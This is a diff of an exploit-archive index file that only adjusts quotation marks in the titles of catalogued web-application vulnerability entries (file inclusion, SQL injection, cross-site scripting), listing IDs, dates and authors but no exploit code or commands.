-29569,platforms/php/webapps/29569.txt,"MySQLNewsEngine - Affichearticles.php3 Remote File Inclusion",2007-02-06,Blaster,php,webapps,0
+29569,platforms/php/webapps/29569.txt,"MySQLNewsEngine - 'Affichearticles.php3' Remote File Inclusion",2007-02-06,Blaster,php,webapps,0
 29570,platforms/hardware/webapps/29570.txt,"TOSHIBA e-Studio 232/233/282/283 - Cross-Site Request Forgery (Change Admin Password)",2013-11-13,"Hubert Gradek",hardware,webapps,0
 29571,platforms/php/webapps/29571.txt,"SYSCP 1.2.15 - System Control Panel CronJob Arbitrary Code Execution",2007-02-07,"Daniel Schulte",php,webapps,0
 29572,platforms/php/webapps/29572.txt,"cPanel 11 - PassWDMySQL Cross-Site Scripting",2007-02-08,s3rv3r_hack3r,php,webapps,0
@@ -31309,7 +31313,7 @@ id,file,description,date,author,platform,type,port
 29606,platforms/php/webapps/29606.txt,"Calendar Express - search.php Cross-Site Scripting",2007-02-15,BL4CK,php,webapps,0
 29676,platforms/php/webapps/29676.txt,"Audins Audiens 3.3 - unistall.php Authentication Bypass",2007-02-26,r00t,php,webapps,0
 29608,platforms/php/webapps/29608.txt,"CedStat 1.31 - 'index.php' hier Parameter Cross-Site Scripting",2007-02-16,sn0oPy,php,webapps,0
-29609,platforms/php/webapps/29609.txt,"Meganoide's News 1.1.1 - Include.php Remote File Inclusion",2007-02-16,KaRTaL,php,webapps,0
+29609,platforms/php/webapps/29609.txt,"Meganoide's News 1.1.1 - 'Include.php' Remote File Inclusion",2007-02-16,KaRTaL,php,webapps,0
 29610,platforms/php/webapps/29610.txt,"Ezboo Webstats 3.03 - Administrative Authentication Bypass",2007-02-16,sn0oPy,php,webapps,0
 29611,platforms/asp/webapps/29611.txt,"Turuncu Portal 1.0 - H_Goster.asp SQL Injection",2007-02-16,chernobiLe,asp,webapps,0
 29612,platforms/hardware/webapps/29612.txt,"WBR-3406 Wireless Broadband NAT Router - Web-Console Password Change Bypass / Cross-Site Request Forgery",2013-11-15,"Yakir Wizman",hardware,webapps,0
@@ -31332,12 +31336,12 @@ id,file,description,date,author,platform,type,port
 29637,platforms/php/webapps/29637.txt,"LoveCMS 1.4 - 'step' Parameter Traversal Arbitrary File Access",2007-02-22,"laurent gaffie",php,webapps,0
 29638,platforms/php/webapps/29638.txt,"LoveCMS 1.4 - 'load' Parameter Traversal Arbitrary File Access",2007-02-22,"laurent gaffie",php,webapps,0
 29639,platforms/php/webapps/29639.txt,"LoveCMS 1.4 - 'id' Parameter Cross-Site Scripting",2007-02-22,"laurent gaffie",php,webapps,0
-29640,platforms/php/webapps/29640.txt,"Shop Kit Plus - StyleCSS.php Local File Inclusion",2007-02-23,"laurent gaffie",php,webapps,0
+29640,platforms/php/webapps/29640.txt,"Shop Kit Plus - 'StyleCSS.php' Local File Inclusion",2007-02-23,"laurent gaffie",php,webapps,0
 29641,platforms/php/webapps/29641.txt,"XT:Commerce 3.04 - 'index.php' Local File Inclusion",2007-02-23,"laurent gaffie",php,webapps,0
 29642,platforms/php/webapps/29642.txt,"Simple one-file Gallery - gallery.php f Parameter Traversal Arbitrary File Access",2007-02-23,"laurent gaffie",php,webapps,0
 29643,platforms/php/webapps/29643.txt,"Simple one-file Gallery - gallery.php f Parameter Cross-Site Scripting",2007-02-23,"laurent gaffie",php,webapps,0
-29644,platforms/php/webapps/29644.txt,"Pickle 0.3 - download.php Local File Inclusion",2007-02-24,"laurent gaffie",php,webapps,0
-29645,platforms/php/webapps/29645.txt,"Active Calendar 1.2 - showcode.php Local File Inclusion",2007-02-24,"Simon Bonnard",php,webapps,0
+29644,platforms/php/webapps/29644.txt,"Pickle 0.3 - 'download.php' Local File Inclusion",2007-02-24,"laurent gaffie",php,webapps,0
+29645,platforms/php/webapps/29645.txt,"Active Calendar 1.2 - 'showcode.php' Local File Inclusion",2007-02-24,"Simon Bonnard",php,webapps,0
 29646,platforms/php/webapps/29646.txt,"Active Calendar 1.2 - data/flatevents.php css Parameter Cross-Site Scripting",2007-02-24,"Simon Bonnard",php,webapps,0
 29647,platforms/php/webapps/29647.txt,"Active Calendar 1.2 - data/js.php css Parameter Cross-Site Scripting",2007-02-24,"Simon Bonnard",php,webapps,0
 29648,platforms/php/webapps/29648.txt,"Active Calendar 1.2 - data/m_2.php css Parameter Cross-Site Scripting",2007-02-24,"Simon Bonnard",php,webapps,0
@@ -31381,7 +31385,7 @@ id,file,description,date,author,platform,type,port
 30370,platforms/php/webapps/30370.txt,"Alstrasoft Affiliate Network Pro 8.0 - 'temp.php' Cross-Site Scripting",2007-07-23,Lostmon,php,webapps,0
 30371,platforms/php/webapps/30371.txt,"Alstrasoft Affiliate Network Pro 8.0 - 'pgmid' Parameter SQL Injection",2007-07-23,Lostmon,php,webapps,0
 29715,platforms/php/webapps/29715.txt,"EPortfolio 1.0 - Client-Side Input Validation",2007-03-05,"Stefan Friedli",php,webapps,0
-29722,platforms/php/webapps/29722.txt,"JCCorp URLShrink Free 1.3.1 - CreateURL.php Remote File Inclusion",2007-03-09,"Hasadya Raed",php,webapps,0
+29722,platforms/php/webapps/29722.txt,"JCCorp URLShrink Free 1.3.1 - 'CreateURL.php' Remote File Inclusion",2007-03-09,"Hasadya Raed",php,webapps,0
 29726,platforms/asp/webapps/29726.pl,"Duyuru Scripti - Goster.asp SQL Injection",2007-03-09,Cr@zy_King,asp,webapps,0
 29727,platforms/php/webapps/29727.txt,"Premod SubDog 2 - includes/functions_kb.php phpbb_root_path Parameter Remote File Inclusion",2007-03-10,"Hasadya Raed",php,webapps,0
 29728,platforms/php/webapps/29728.txt,"Premod SubDog 2 - includes/themen_portal_mitte.php phpbb_root_path Parameter Remote File Inclusion",2007-03-10,"Hasadya Raed",php,webapps,0
@@ -31390,7 +31394,7 @@ id,file,description,date,author,platform,type,port
 29731,platforms/php/webapps/29731.txt,"SoftNews 4.1/5.5 - 'engine/Ajax/editnews.php' root_dir Parameter Remote File Inclusion",2007-03-10,"Hasadya Raed",php,webapps,0
 29733,platforms/php/webapps/29733.txt,"PHP-Nuke 8.2.4 - Multiple Vulnerabilities",2013-11-20,"Sojobo dev team",php,webapps,80
 29736,platforms/php/webapps/29736.txt,"ClipShare 1.5.3 - 'ADODB-Connection.Inc.php' Remote File Inclusion",2007-03-12,"RaeD Hasadya",php,webapps,0
-29737,platforms/php/webapps/29737.txt,"Weekly Drawing Contest 0.0.1 - Check_Vote.php Local File Inclusion",2007-03-13,"BorN To K!LL",php,webapps,0
+29737,platforms/php/webapps/29737.txt,"Weekly Drawing Contest 0.0.1 - 'Check_Vote.php' Local File Inclusion",2007-03-13,"BorN To K!LL",php,webapps,0
 29742,platforms/php/webapps/29742.txt,"Horde IMP Webmail 4.0.4 Client - Multiple Input Validation Vulnerabilities",2007-03-15,"Immerda Project Group",php,webapps,0
 29744,platforms/php/webapps/29744.txt,"Viper Web Portal 0.1 - 'index.php' Remote File Inclusion",2007-03-15,"Abdus Samad",php,webapps,0
 29745,platforms/php/webapps/29745.txt,"Horde Framework 3.1.3 - 'login.php' Cross-Site Scripting",2007-03-15,"Moritz Naumann",php,webapps,0
@@ -31398,7 +31402,7 @@ id,file,description,date,author,platform,type,port
 29748,platforms/php/webapps/29748.txt,"Holtstraeter Rot 13 - Enkrypt.php Directory Traversal",2007-03-16,"BorN To K!LL",php,webapps,0
 29750,platforms/php/webapps/29750.php,"phpStats 0.1.9 - Multiple SQL Injections",2007-03-16,rgod,php,webapps,0
 29751,platforms/php/webapps/29751.php,"phpStats 0.1.9 - PHP-Stats-options.php Remote Code Execution",2007-03-17,rgod,php,webapps,0
-29754,platforms/php/webapps/29754.html,"WordPress < 2.1.2 - PHP_Self Cross-Site Scripting",2007-03-19,"Alexander Concha",php,webapps,0
+29754,platforms/php/webapps/29754.html,"WordPress < 2.1.2 - 'PHP_Self' Cross-Site Scripting",2007-03-19,"Alexander Concha",php,webapps,0
 29755,platforms/php/webapps/29755.html,"Guesbara 1.2 - Administrator Password Change",2007-03-19,Kacper,php,webapps,0
 29756,platforms/php/webapps/29756.txt,"PHPX 3.5.15/3.5.16 - 'print.php' SQL Injection",2007-03-19,"laurent gaffie",php,webapps,0
 29757,platforms/php/webapps/29757.txt,"PHPX 3.5.15/3.5.16 - 'forums.php' SQL Injection",2007-03-19,"laurent gaffie",php,webapps,0
@@ -31417,7 +31421,7 @@ id,file,description,date,author,platform,type,port
 29775,platforms/php/webapps/29775.txt,"Image_Upload Script 2.0 - Multiple Remote File Inclusion",2007-03-26,Crackers_Child,php,webapps,0
 29776,platforms/php/webapps/29776.txt,"CcCounter 2.0 - 'index.php' Cross-Site Scripting",2007-03-26,Crackers_Child,php,webapps,0
 29780,platforms/php/webapps/29780.txt,"Mephisto Blog 0.7.3 - Search Function Cross-Site Scripting",2007-03-26,The[Boss],php,webapps,0
-29782,platforms/php/webapps/29782.txt,"Satel Lite - Satellite.php Local File Inclusion",2007-11-26,rUnViRuS,php,webapps,0
+29782,platforms/php/webapps/29782.txt,"Satel Lite - 'Satellite.php' Local File Inclusion",2007-11-26,rUnViRuS,php,webapps,0
 29783,platforms/php/webapps/29783.txt,"Fizzle 0.5 - RSS Feed HTML Injection",2007-03-26,"CrYpTiC MauleR",php,webapps,0
 29786,platforms/php/webapps/29786.txt,"aBitWhizzy - 'whizzylink.php' 'd' Parameter Traversal Arbitrary Directory Listing",2007-03-14,Lostmon,php,webapps,0
 30105,platforms/php/webapps/30105.txt,"WordPress Plugin Download Manager Free & Pro 2.5.8 - Persistent Cross-Site Scripting",2013-12-08,"Jeroen - IT Nerdbox",php,webapps,0
@@ -31484,10 +31488,10 @@ id,file,description,date,author,platform,type,port
 29821,platforms/php/webapps/29821.txt,"Livor 2.5 - 'index.php' Cross-Site Scripting",2007-04-06,"Arham Muhammad",php,webapps,0
 29824,platforms/php/webapps/29824.txt,"QuizShock 1.6.1 - auth.php HTML Injection",2007-04-09,"John Martinelli",php,webapps,0
 29825,platforms/php/webapps/29825.txt,"UBBCentral UBB.Threads 6.1.1 - 'UBBThreads.php' SQL Injection",2007-04-09,"John Martinelli",php,webapps,0
-29827,platforms/php/webapps/29827.pl,"eCardMAX HotEditor 4.0 - Keyboard.php Local File Inclusion",2007-04-09,Liz0ziM,php,webapps,0
+29827,platforms/php/webapps/29827.pl,"eCardMAX HotEditor 4.0 - 'Keyboard.php' Local File Inclusion",2007-04-09,Liz0ziM,php,webapps,0
 29828,platforms/php/webapps/29828.html,"DeskPro 2.0.1 - 'login.php' HTML Injection",2007-04-09,"John Martinelli",php,webapps,0
 29829,platforms/php/webapps/29829.txt,"Einfacher Passworschutz - 'index.php' Cross-Site Scripting",2007-04-10,hackberry,php,webapps,0
-29830,platforms/php/webapps/29830.txt,"MyNews 4.2.2 - Week_Events.php Remote File Inclusion",2007-04-10,hackberry,php,webapps,0
+29830,platforms/php/webapps/29830.txt,"MyNews 4.2.2 - 'Week_Events.php' Remote File Inclusion",2007-04-10,hackberry,php,webapps,0
 29831,platforms/php/webapps/29831.txt,"DropAFew 0.2 - newaccount2.php Arbitrary Account Creation",2007-04-10,"Alexander Klink",php,webapps,0
 29832,platforms/php/webapps/29832.txt,"DropAFew 0.2 - search.php delete Action id Parameter SQL Injection",2007-04-10,"Alexander Klink",php,webapps,0
 29833,platforms/php/webapps/29833.txt,"DropAFew 0.2 - editlogcal.php save Action calories Parameter SQL Injection",2007-04-10,"Alexander Klink",php,webapps,0
@@ -31507,26 +31511,26 @@ id,file,description,date,author,platform,type,port
 29854,platforms/php/webapps/29854.txt,"BloofoxCMS 0.2.2 - Img_Popup.php Cross-Site Scripting",2007-04-14,the_Edit0r,php,webapps,0
 29855,platforms/php/webapps/29855.txt,"Flowers - Cas.php Cross-Site Scripting",2007-04-14,the_Edit0r,php,webapps,0
 29861,platforms/php/webapps/29861.txt,"Palo Alto Networks Pan-OS 5.0.8 - Multiple Vulnerabilities",2013-11-27,"Thomas Pollet",php,webapps,0
-29862,platforms/php/webapps/29862.pl,"Web Service Deluxe News Manager 1.0.1 Deluxe - footer.php Local File Inclusion",2007-04-16,BeyazKurt,php,webapps,0
-29863,platforms/php/webapps/29863.txt,"Actionpoll 1.1 - Actionpoll.php Remote File Inclusion",2007-04-16,SekoMirza,php,webapps,0
+29862,platforms/php/webapps/29862.pl,"Web Service Deluxe News Manager 1.0.1 Deluxe - 'footer.php' Local File Inclusion",2007-04-16,BeyazKurt,php,webapps,0
+29863,platforms/php/webapps/29863.txt,"Actionpoll 1.1 - 'Actionpoll.php' Remote File Inclusion",2007-04-16,SekoMirza,php,webapps,0
 29864,platforms/php/webapps/29864.php,"MyBlog 0.9.8 - Settings.php Authentication Bypass",2007-04-16,BlackHawk,php,webapps,0
 29865,platforms/php/webapps/29865.txt,"Wabbit Gallery Script 0.9 - showpic.php Multiple Cross-Site Scripting Vulnerabilities",2007-04-17,the_Edit0r,php,webapps,0
 29866,platforms/php/webapps/29866.txt,"PHP-Nuke 8.0.3.3b - SQL Injection Protection Bypass / Multiple SQL Injections",2007-04-17,Aleksandar,php,webapps,0
 29868,platforms/php/webapps/29868.txt,"NuclearBB Alpha 1 - Multiple SQL Injections",2007-04-18,"John Martinelli",php,webapps,0
-29869,platforms/php/webapps/29869.php,"Fully Modded PHPBB2 - phpbb_root_path Remote File Inclusion",2007-04-19,"HACKERS PAL",php,webapps,0
+29869,platforms/php/webapps/29869.php,"Fully Modded PHPBB2 - 'phpbb_root_path' Remote File Inclusion",2007-04-19,"HACKERS PAL",php,webapps,0
 29870,platforms/php/webapps/29870.txt,"Exponent CMS 0.96.5/0.96.6 - magpie_debug.php url Parameter Cross-Site Scripting",2007-04-20,"Hamid Ebadi",php,webapps,0
 29871,platforms/php/webapps/29871.txt,"Exponent CMS 0.96.5/0.96.6 - magpie_slashbox.php rss_url Parameter Cross-Site Scripting",2007-04-20,"Hamid Ebadi",php,webapps,0
 29872,platforms/php/webapps/29872.txt,"Exponent CMS 0.96.5/0.96.6 - 'iconspopup.php' 'icodir' Parameter Traversal Arbitrary Directory Listing",2007-04-20,"Hamid Ebadi",php,webapps,0
-29874,platforms/php/webapps/29874.txt,"PHP Turbulence 0.0.1 - Turbulence.php Remote File Inclusion",2007-04-20,Omni,php,webapps,0
+29874,platforms/php/webapps/29874.txt,"PHP Turbulence 0.0.1 - 'Turbulence.php' Remote File Inclusion",2007-04-20,Omni,php,webapps,0
 29876,platforms/php/webapps/29876.txt,"TJSChat 0.95 - You.php Cross-Site Scripting",2007-04-23,the_Edit0r,php,webapps,0
 29877,platforms/php/webapps/29877.html,"Ripe Website Manager 0.8.4 - contact/index.php ripeformpost Parameter SQL Injection",2007-04-23,"John Martinelli",php,webapps,0
-29878,platforms/php/webapps/29878.txt,"Allfaclassifieds 6.04 - Level2.php Remote File Inclusion",2007-04-23,Dr.RoVeR,php,webapps,0
-29879,platforms/php/webapps/29879.txt,"PHPMyBibli 1.32 - Init.Inc.php Remote File Inclusion",2007-04-23,MoHaNdKo,php,webapps,0
+29878,platforms/php/webapps/29878.txt,"Allfaclassifieds 6.04 - 'Level2.php' Remote File Inclusion",2007-04-23,Dr.RoVeR,php,webapps,0
+29879,platforms/php/webapps/29879.txt,"PHPMyBibli 1.32 - 'Init.Inc.php' Remote File Inclusion",2007-04-23,MoHaNdKo,php,webapps,0
 29880,platforms/php/webapps/29880.txt,"File117 - Multiple Remote File Inclusion",2007-04-23,InyeXion,php,webapps,0
 29882,platforms/php/webapps/29882.html,"PHPMySpace Gold 8.10 - article.php SQL Injection",2007-04-23,"John Martinelli",php,webapps,0
-29883,platforms/php/webapps/29883.txt,"ACVSWS - Transport.php Remote File Inclusion",2007-04-23,MoHaNdKo,php,webapps,0
+29883,platforms/php/webapps/29883.txt,"ACVSWS - 'Transport.php' Remote File Inclusion",2007-04-23,MoHaNdKo,php,webapps,0
 29885,platforms/php/webapps/29885.txt,"Claroline 1.x - RootSys Remote File Inclusion",2007-04-23,MoHaNdKo,php,webapps,0
-29886,platforms/php/webapps/29886.txt,"Lms 1.5.x - RTMessageAdd.php Remote File Inclusion",2007-04-23,InyeXion,php,webapps,0
+29886,platforms/php/webapps/29886.txt,"Lms 1.5.x - 'RTMessageAdd.php' Remote File Inclusion",2007-04-23,InyeXion,php,webapps,0
 29887,platforms/php/webapps/29887.txt,"Phorum 5.1.20 - admin.php Groups Module group_id Parameter Cross-Site Scripting",2007-04-23,"Janek Vind",php,webapps,0
 29888,platforms/php/webapps/29888.txt,"Phorum 5.1.20 - admin.php modsettings Module smiley_id Parameter Cross-Site Scripting",2007-04-23,"Janek Vind",php,webapps,0
 29889,platforms/php/webapps/29889.txt,"Phorum 5.1.20 - include/controlcenter/users.php Multiple Method Privilege Escalation",2007-04-23,"Janek Vind",php,webapps,0
@@ -31537,20 +31541,20 @@ id,file,description,date,author,platform,type,port
 29894,platforms/php/webapps/29894.txt,"Phorum 5.1.20 - admin.php Groups Module Edit/Add Group Field SQL Injection",2007-04-23,"Janek Vind",php,webapps,0
 29895,platforms/php/webapps/29895.txt,"phpMyAdmin 2.9.1 - Multiple Cross-Site Scripting Vulnerabilities",2007-04-24,sp3x@securityreason.com,php,webapps,0
 29898,platforms/php/webapps/29898.txt,"plesk 8.1.1 - 'login.php3' Directory Traversal",2007-04-25,anonymous,php,webapps,0
-29899,platforms/php/webapps/29899.txt,"MyNewsGroups 0.6 - Include.php Remote File Inclusion",2007-04-25,"Ali and Saeid",php,webapps,0
-29902,platforms/php/webapps/29902.txt,"PHPMyTGP 1.4 - AddVIP.php Remote File Inclusion",2007-04-25,alijsb,php,webapps,0
+29899,platforms/php/webapps/29899.txt,"MyNewsGroups 0.6 - 'Include.php' Remote File Inclusion",2007-04-25,"Ali and Saeid",php,webapps,0
+29902,platforms/php/webapps/29902.txt,"PHPMyTGP 1.4 - 'AddVIP.php' Remote File Inclusion",2007-04-25,alijsb,php,webapps,0
 29903,platforms/php/webapps/29903.txt,"Ahhp Portal - 'page.php' Multiple Remote File Inclusion",2007-04-25,CodeXpLoder'tq,php,webapps,0
 29904,platforms/php/webapps/29904.txt,"CafeLog B2 0.6.1 Weblog and News Publishing Tool - 'b2archives.php' b2inc Parameter Remote File Inclusion",2006-04-25,alijsb,php,webapps,0
 29905,platforms/php/webapps/29905.txt,"CafeLog B2 0.6.1 Weblog and News Publishing Tool - 'b2categories.php' b2inc Parameter Remote File Inclusion",2006-04-25,alijsb,php,webapps,0
 29906,platforms/php/webapps/29906.txt,"CafeLog B2 0.6.1 Weblog and News Publishing Tool - 'b2mail.php' b2inc Parameter Remote File Inclusion",2006-04-25,alijsb,php,webapps,0
-29907,platforms/php/webapps/29907.txt,"Comus 2.0 - Accept.php Remote File Inclusion",2007-04-25,alijsb,php,webapps,0
+29907,platforms/php/webapps/29907.txt,"Comus 2.0 - 'Accept.php' Remote File Inclusion",2007-04-25,alijsb,php,webapps,0
 29908,platforms/php/webapps/29908.txt,"SunShop Shopping Cart 3.5/4.0 - Multiple Remote File Inclusion",2007-04-25,s3rv3r_hack3r,php,webapps,0
 29909,platforms/php/webapps/29909.txt,"HYIP Manager Pro - Multiple Remote File Inclusion",2007-04-25,alijsb,php,webapps,0
-29910,platforms/php/webapps/29910.txt,"HTMLEditBox 2.2 - config.php Remote File Inclusion",2007-04-25,alijsb,php,webapps,0
-29911,platforms/php/webapps/29911.txt,"DynaTracker 1.5.1 - includes_handler.php base_path Remote File Inclusion",2007-04-25,alijsb,php,webapps,0
-29912,platforms/php/webapps/29912.txt,"DynaTracker 1.5.1 - action.php base_path Remote File Inclusion",2007-04-25,alijsb,php,webapps,0
+29910,platforms/php/webapps/29910.txt,"HTMLEditBox 2.2 - 'config.php' Remote File Inclusion",2007-04-25,alijsb,php,webapps,0
+29911,platforms/php/webapps/29911.txt,"DynaTracker 1.5.1 - 'includes_handler.php' 'base_path' Remote File Inclusion",2007-04-25,alijsb,php,webapps,0
+29912,platforms/php/webapps/29912.txt,"DynaTracker 1.5.1 - 'action.php' 'base_path' Remote File Inclusion",2007-04-25,alijsb,php,webapps,0
 29913,platforms/php/webapps/29913.txt,"Active PHP BookMarks 1.0 - 'APB.php' Remote File Inclusion",2007-04-25,"ali & saeid",php,webapps,0
-29914,platforms/php/webapps/29914.txt,"Doruk100Net - Info.php Remote File Inclusion",2007-04-26,Ali7,php,webapps,0
+29914,platforms/php/webapps/29914.txt,"Doruk100Net - 'Info.php' Remote File Inclusion",2007-04-26,Ali7,php,webapps,0
 29915,platforms/php/webapps/29915.txt,"MoinMoin 1.5.x - 'index.php' Cross-Site Scripting",2007-04-26,"En Douli",php,webapps,0
 29917,platforms/php/webapps/29917.php,"FlashComs Chat 6.5 - Arbitrary File Upload",2013-11-30,"Miya Chung",php,webapps,0
 29918,platforms/java/webapps/29918.txt,"Ametys CMS 3.5.2 - (lang Parameter) XPath Injection",2013-11-30,LiquidWorm,java,webapps,0
@@ -31562,13 +31566,13 @@ id,file,description,date,author,platform,type,port
 29935,platforms/php/webapps/29935.php,"MyBB 1.6.11 - Remote Code Execution",2013-11-30,BlackDream,php,webapps,0
 29938,platforms/php/webapps/29938.txt,"E-Annu - home.php SQL Injection",2007-04-30,ilkerkandemir,php,webapps,0
 29941,platforms/php/webapps/29941.txt,"CMS Made Simple 1.0.5 - 'Stylesheet.php' SQL Injection",2007-05-02,"Daniel Lucq",php,webapps,0
-29944,platforms/php/webapps/29944.pl,"PHPSecurityAdmin 4.0.2 - Logout.php Remote File Inclusion",2007-05-03,"ilker Kandemir",php,webapps,0
+29944,platforms/php/webapps/29944.pl,"PHPSecurityAdmin 4.0.2 - 'Logout.php' Remote File Inclusion",2007-05-03,"ilker Kandemir",php,webapps,0
 29946,platforms/php/webapps/29946.txt,"Multiple WordPress Orange Themes - Cross-Site Request Forgery (Arbitrary File Upload)",2013-12-01,"Jje Incovers",php,webapps,0
 30197,platforms/php/webapps/30197.txt,"WSPortal 1.0 - content.php SQL Injection",2007-06-18,"Jesper Jurcenoks",php,webapps,0
 30198,platforms/asp/webapps/30198.txt,"TDizin - Arama.asp Cross-Site Scripting",2007-06-18,GeFORC3,asp,webapps,0
 30199,platforms/cgi/webapps/30199.txt,"WebIf - OutConfig Parameter Local File Inclusion",2007-06-18,maiosyet,cgi,webapps,0
 30059,platforms/php/webapps/30059.py,"Eaton Network Shutdown Module 3.21 - Remote PHP Code Injection",2013-12-06,"Filip Waeytens",php,webapps,0
-29953,platforms/php/webapps/29953.txt,"PHP Content Architect 0.9 pre 1.2 - MFA_Theme.php Remote File Inclusion",2007-05-07,kezzap66345,php,webapps,0
+29953,platforms/php/webapps/29953.txt,"PHP Content Architect 0.9 pre 1.2 - 'MFA_Theme.php' Remote File Inclusion",2007-05-07,kezzap66345,php,webapps,0
 29955,platforms/php/webapps/29955.txt,"WF-Quote 1.0 Xoops Module - 'index.php' SQL Injection",2007-05-07,Bulan,php,webapps,0
 29956,platforms/php/webapps/29956.txt,"ObieWebsite Mini Web Shop 2 - order_form.php PATH_INFO Parameter Cross-Site Scripting",2007-05-02,CorryL,php,webapps,0
 29957,platforms/php/webapps/29957.txt,"ObieWebsite Mini Web Shop 2 - Sendmail.php PATH_INFO Parameter Cross-Site Scripting",2007-05-02,CorryL,php,webapps,0
@@ -31703,7 +31707,7 @@ id,file,description,date,author,platform,type,port
 30388,platforms/php/webapps/30388.txt,"Vikingboard 0.1.2 - 'cp.php' Information Disclosure",2007-07-25,Lostmon,php,webapps,0
 30389,platforms/php/webapps/30389.txt,"iFoto 1.0 - 'index.php' Directory Traversal",2007-07-25,Lostmon,php,webapps,0
 30390,platforms/php/webapps/30390.txt,"BSM Store Dependent Forums 1.02 - 'Username' Parameter SQL Injection",2007-07-26,"Aria-Security Team",php,webapps,0
-30391,platforms/php/webapps/30391.txt,"PHPHostBot 1.05 - Authorize.php Remote File Inclusion",2007-07-26,S4M3K,php,webapps,0
+30391,platforms/php/webapps/30391.txt,"PHPHostBot 1.05 - 'Authorize.php' Remote File Inclusion",2007-07-26,S4M3K,php,webapps,0
 30801,platforms/php/webapps/30801.txt,"Bandersnatch 0.4 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2007-11-23,"Tim Brown",php,webapps,0
 30310,platforms/php/webapps/30310.txt,"Piwigo 2.5.3 CMS - Multiple Web Vulnerabilities",2013-12-15,sajith,php,webapps,0
 30311,platforms/ios/webapps/30311.txt,"Phone Drive Eightythree 4.1.1 iOS - Multiple Vulnerabilities",2013-12-15,Vulnerability-Lab,ios,webapps,0
@@ -31723,7 +31727,7 @@ id,file,description,date,author,platform,type,port
 30330,platforms/asp/webapps/30330.txt,"Alisveris Sitesi Scripti - index.asp Cross-Site Scripting",2007-07-23,GeFORC3,asp,webapps,0
 30331,platforms/asp/webapps/30331.html,"ASP cvmatik 1.1 - Multiple HTML Injection Vulnerabilities",2007-07-23,GeFORC3,asp,webapps,0
 30332,platforms/asp/webapps/30332.txt,"Image Racer - searchresults.asp SQL Injection",2007-07-23,"Aria-Security Team",asp,webapps,0
-30333,platforms/php/webapps/30333.txt,"PHMe 0.0.2 - Function_List.php Local File Inclusion",2007-07-23,You_You,php,webapps,0
+30333,platforms/php/webapps/30333.txt,"PHMe 0.0.2 - 'Function_List.php' Local File Inclusion",2007-07-23,You_You,php,webapps,0
 30382,platforms/asp/webapps/30382.txt,"W1L3D4 philboard 0.3 - Cross-Site Scripting",2007-07-25,GeFORC3,asp,webapps,0
 30378,platforms/php/webapps/30378.txt,"Webbler CMS 3.1.3 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2007-07-24,"Adrian Pastor",php,webapps,0
 30379,platforms/php/webapps/30379.html,"Webbler CMS 3.1.3 - Mail A Friend Open Email Relay",2007-07-24,"Adrian Pastor",php,webapps,0
@@ -31785,11 +31789,11 @@ id,file,description,date,author,platform,type,port
 30451,platforms/asp/webapps/30451.txt,"Next Gen Portfolio Manager - 'default.asp' Multiple SQL Injections",2007-08-03,"Aria-Security Team",asp,webapps,0
 30452,platforms/php/webapps/30452.txt,"J! Reactions 1.8.1 - comPath Remote File Inclusion",2007-08-04,Yollubunlar.Org,php,webapps,0
 30453,platforms/php/webapps/30453.txt,"snif 1.5.2 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2007-08-06,r0t,php,webapps,0
-30456,platforms/php/webapps/30456.txt,"VietPHP - _functions.php dirpath Parameter Remote File Inclusion",2007-08-07,master-of-desastor,php,webapps,0
-30457,platforms/php/webapps/30457.txt,"VietPHP - admin/index.php language Parameter Remote File Inclusion",2007-08-07,master-of-desastor,php,webapps,0
+30456,platforms/php/webapps/30456.txt,"VietPHP - '_functions.php' dirpath Parameter Remote File Inclusion",2007-08-07,master-of-desastor,php,webapps,0
+30457,platforms/php/webapps/30457.txt,"VietPHP - 'admin/index.php' language Parameter Remote File Inclusion",2007-08-07,master-of-desastor,php,webapps,0
 30810,platforms/php/webapps/30810.txt,"Proverbs Web Calendar 1.1 - 'Password' Parameter SQL Injection",2007-11-26,JosS,php,webapps,0
 30459,platforms/php/webapps/30459.txt,"VietPHP - 'index.php' language Parameter Remote File Inclusion",2007-08-07,master-of-desastor,php,webapps,0
-30463,platforms/php/webapps/30463.txt,"Coppermine Photo Gallery 1.3/1.4 - YABBSE.INC.php Remote File Inclusion",2007-08-08,Ma$tEr-0F-De$a$t0r,php,webapps,0
+30463,platforms/php/webapps/30463.txt,"Coppermine Photo Gallery 1.3/1.4 - 'YABBSE.INC.php' Remote File Inclusion",2007-08-08,Ma$tEr-0F-De$a$t0r,php,webapps,0
 30900,platforms/hardware/webapps/30900.html,"Feixun Wireless Router FWR-604H - Remote Code Execution",2014-01-14,"Arash Abedian",hardware,webapps,80
 30465,platforms/php/webapps/30465.txt,"Mapos-Scripts.de Gastebuch 1.5 - 'index.php' Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0
 30466,platforms/php/webapps/30466.txt,"File Uploader 1.1 - 'index.php' config[root_ordner] Parameter Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0
@@ -31798,12 +31802,12 @@ id,file,description,date,author,platform,type,port
 30475,platforms/cgi/webapps/30475.txt,"Synology DSM 4.3-3810 - Directory Traversal",2013-12-24,"Andrea Fabrizi",cgi,webapps,80
 30476,platforms/ios/webapps/30476.txt,"Song Exporter 2.1.1 RS iOS - Local File Inclusion",2013-12-24,Vulnerability-Lab,ios,webapps,80
 30478,platforms/php/webapps/30478.txt,"PHP MBB CMS 004 - Multiple Vulnerabilities",2013-12-24,cr4wl3r,php,webapps,80
-30479,platforms/php/webapps/30479.txt,"Shoutbox 1.0 - Shoutbox.php Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0
+30479,platforms/php/webapps/30479.txt,"Shoutbox 1.0 - 'Shoutbox.php' Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0
 30480,platforms/php/webapps/30480.txt,"Bilder Galerie 1.0 - 'index.php' Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0
 30481,platforms/php/webapps/30481.txt,"Web News 1.1 - 'index.php' config[root_ordner] Parameter Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0
-30482,platforms/php/webapps/30482.txt,"Web News 1.1 - feed.php config[root_ordner] Parameter Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0
-30483,platforms/php/webapps/30483.txt,"Web News 1.1 - news.php config[root_ordner] Parameter Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0
-30486,platforms/php/webapps/30486.txt,"Lib2 PHP Library 0.2 - My_Statistics.php Remote File Inclusion",2007-08-11,"ilker Kandemir",php,webapps,0
+30482,platforms/php/webapps/30482.txt,"Web News 1.1 - 'feed.php' 'config[root_ordner]' Parameter Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0
